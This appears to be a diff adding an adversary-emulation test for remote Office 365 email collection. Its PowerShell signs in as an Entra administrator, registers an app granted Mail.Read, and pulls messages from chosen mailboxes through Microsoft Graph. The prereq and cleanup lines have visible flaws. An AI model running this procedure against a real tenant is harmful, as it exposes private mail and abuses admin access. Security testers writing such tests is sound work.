Create T1114.002.yaml

atomics/T1114.002/T1114.002.yaml

@@ -0,0 +1,80 @@
+attack_technique: T1114.002
+display_name: 'Email Collection: Remote Email Collection'
+atomic_tests:
+- name: Office365 - Remote Mail Collected
+  description: |
+    Create and register an entra application that downloads emails from a tenant's Office 365 mailboxes using the Microsoft Graph API app-only access. This can be used by an adversary to collect an organization's sensitive information. 
+  supported_platforms:
+  - office-365
+  input_arguments:
+    username:
+      description: Full username (including @domain) of Entra user w/ AppRoleassignment.ReadWrite.All and Application.ReadWrite.All Scope (eg, Global Administrator Role) and sign-in method is password  
+      type: string
+      default:
+    password:
+      description: Entra user password
+      type: string
+      default:
+    1st_target_mailbox:
+      description: office-365 target_email_address
+      type: string
+      default: 
+    2nd_target_mailbox:
+      description: office-365 target_email_address
+      type: string
+      default: 
+    3rd_target_mailbox:
+      description: office-365 target_email_address
+      type: string
+      default: 
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Microsoft Graph PowerShell SDK must be installed.
+    prereq_command: |
+     $RequiredModule = Get-InstalledModule Microsoft.Graph
+     if (-not $RequiredModule) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module Microsoft.Graph -Scope CurrentUser
+  - description: |
+      Az.Accounts module must be installed.
+    prereq_command: |
+      $RequiredModule2 = Get -InstallModule Az.Accounts
+      if (-not $RequiredModule2) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module Az.Accounts -Scope CurrentUser
+  executor:
+    command: |
+      $ss = ConvertTo-SecureString "#{password}" -AsPlainText -Force
+      $cred = New-Object PSCredential -ArgumentList '#{username}', $ss
+      $param = @{
+          Credential = $cred
+          Force      = $true
+      }
+      $null = Connect-AzAccount @param
+      $token = (Get-AzAccessToken -ResourceTypeName MSGraph -ErrorAction Stop).token
+      $cert = New-SelfSignedCertificate -Subject "CN=PowerShell Application" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature -KeyLength 2048 -KeyAlgorithm RSA -HashAlgorithm SHA256
+      $reqResourceAccess = ( @{ "resourceAccess" = (@{"id"= "570282fd-fa5c-430d-a7fd-fc8dc98a9dca"; "type"= "Scope"}, @{ "id"= "7427e0e9-2fba-42fe-b0c0-848c9e6a8182"; "type"= "Scope"}, @{"id"= "37f7f235-527c-4136-accd-4a02d197296e"; "type"= "Scope"}, @{"id"= "14dad69e-099b-42c9-810b-d002981feec1"; "type"= "Scope"}, @{ "id"= "e1fe6dd8-ba31-4d61-89e7-88639da4683d"; "type"= "Scope"}, @{ "id"= "810c84a8-4a9e-49e6-bf7d-12d183f40d01"; "type"= "Role"}); "resourceAppId" = "00000003-0000-0000-c000-000000000000" })
+      connect-mggraph -AccessToken $token
+      $context = Get-MgContext       
+      $users = get-MgUser
+      $app = New-MgApplication -DisplayName "T1114.002 Atomic Test #1 - Office365 - Remote Email Collection" -RequiredResourceAccess $reqResourceAccess -Web @{ RedirectUris="http://localhost"; } -KeyCredentials @(@{ Type="AsymmetricX509Cert"; Usage="Verify"; Key=$cert.RawData })
+      New-MgServicePrincipal -AppId $app.appId -AdditionalProperties @{} | Out-Null
+      $resourceSPN = Get-MgServicePrincipal -Filter "AppId eq '$($app.AppId)'"
+      $graphApiApp = Get-MgServicePrincipal -Filter "DisplayName eq 'Microsoft Graph'"
+      $mailRole = $graphApiApp.AppRoles|Where-Object Value -Eq "Mail.Read"
+      New-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $resourceSPN.Id -PrincipalId $resourceSPN.Id -ResourceId $graphApiApp.id -AppRoleId $mailRole.Id
+      $mailbox1 = "#{1st_target_mailbox}"
+      $mailbox2 = "#{2nd_target_mailbox}"
+      $mailbox3 = "#{3rd_target_mailbox}"
+      [System.Collections.ArrayList]$selectUsers = @()
+      foreach ($user in $users) {if (($user.Mail -eq $mailbox1) -Or ($user.Mail -eq $mailbox2) -Or ($user.Mail -eq $mailbox3)){$selectUsers.Add($user.id)}}
+      connect-mggraph -ClientId $app.AppId -TenantId $context.TenantId -CertificateName $cert.Subjectname.Name
+      foreach ($user in $selectUsers) { $url= "https://graph.microsoft.com/v1.0/users/$($user)/messages" ; Invoke-MgGraphRequest -Uri $url -Method GET -OutputType PSObject}
+    cleanup_command: |
+      connect-mggraph -Scopes AppRoleAssignment.ReadWrite.All,Application.ReadWrite.All,User.Read -NoWelcome
+      Remove-MgApplication $app.AppId
+      Remove-Item -Path Cert:\CurrentUser\My\$($cert.thumbprint) -DeleteKey
+      Disconnect-MgGraph
+    name: powershell
+    elevation_required: false